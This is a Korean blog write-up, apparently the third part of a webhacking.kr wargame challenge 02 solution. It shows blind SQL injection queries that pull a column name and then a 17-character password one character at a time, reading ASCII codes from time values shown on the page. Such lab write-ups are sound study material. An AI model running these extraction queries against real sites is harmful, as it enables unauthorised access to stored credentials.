728x90
반응형

2번째 포스팅에서 컬럼 갯수를 확인하였고 컬럼명의 길이를 구하는 과정에서 막혀 3번째 포스팅까지 오게되었습니다.. 2번째 포스팅 할 때는 죽어도 안 되더니 포스팅 할려고 쿼리문을 삽입해보니.. 잘 되는

5. 첫 번째 테이블의 컬럼명의 길이 구하기구하기

select length(column_name) from information_schema.columns where table_name="admin_area_pw"

테이블의 컬럼 명의 글자 수는 2글자로 확인됩니다.

6. 첫 번째 테이블의 컬럼명 구하기

(select ascii(substring(column_name, 1, 1)) from information_schema.columns where table_name="admin_area_pw")

01:52초가 출력되었네요 01:52 -> 112sec -> ascii 코드 'p'

(select ascii(substring(column_name, 2, 1)) from information_schema.columns where table_name="admin_area_pw")

01:59초가 출력되었네요 01:59 -> 119sec -> ascii 코드 'w'

7. Value의 글자 수 구하기

Value 값의 글자 수는 17글자로 확인됩니다.

앞서 테이블명을 구했던 것 처럼 ascii 코드로 출력하여 패스워드로 추측되는 Value 값을 얻어보려 합니다.

8. Value 값 구하기

select ascii(substring(**, 1, 1)) from ad***********

01:47 -> 107 -> ascii 'k'

select ascii(substring(**, 2, 1)) from ad***********

01:57 -> 117 -> ascii 'u'

select ascii(substring(**, 3, 1)) from ad***********

01:40 -> 100 -> ascii 'd'

...

select ascii(substring(**, 17, 1)) from ad***********

노가다로 17번째까지 하여 Value 값을 구했습니다.

앞에서 구한 Value 값을 admin.php의 Password로 제출 해보겠습니다.

Challenge 02번 Clear !!!

생각해보니 기본적인 웹 해킹에 쩔쩔맨 제 모습이 한심합니다...

다시 한 번 DB에 대해서 공부를 해야겠다는 경각심이 듭니다

다음은 3번 챌린지로 돌아오겠습니다!!!

허접한 글을 봐주시느라 정말 고생이 많으셨습니다

728x90
반응형

'4. Web Hacking > 1. Webhacking.kr' 카테고리의 다른 글

Challenge(old) - 05  (0) 2022.02.04
Challenge(old) - 03  (0) 2022.02.04
Challenge(old) - 02 Part.2  (0) 2022.02.04
Challenge(old) - 02  (0) 2022.02.04
Challenge(old) - 01  (0) 2022.02.04

+ Recent posts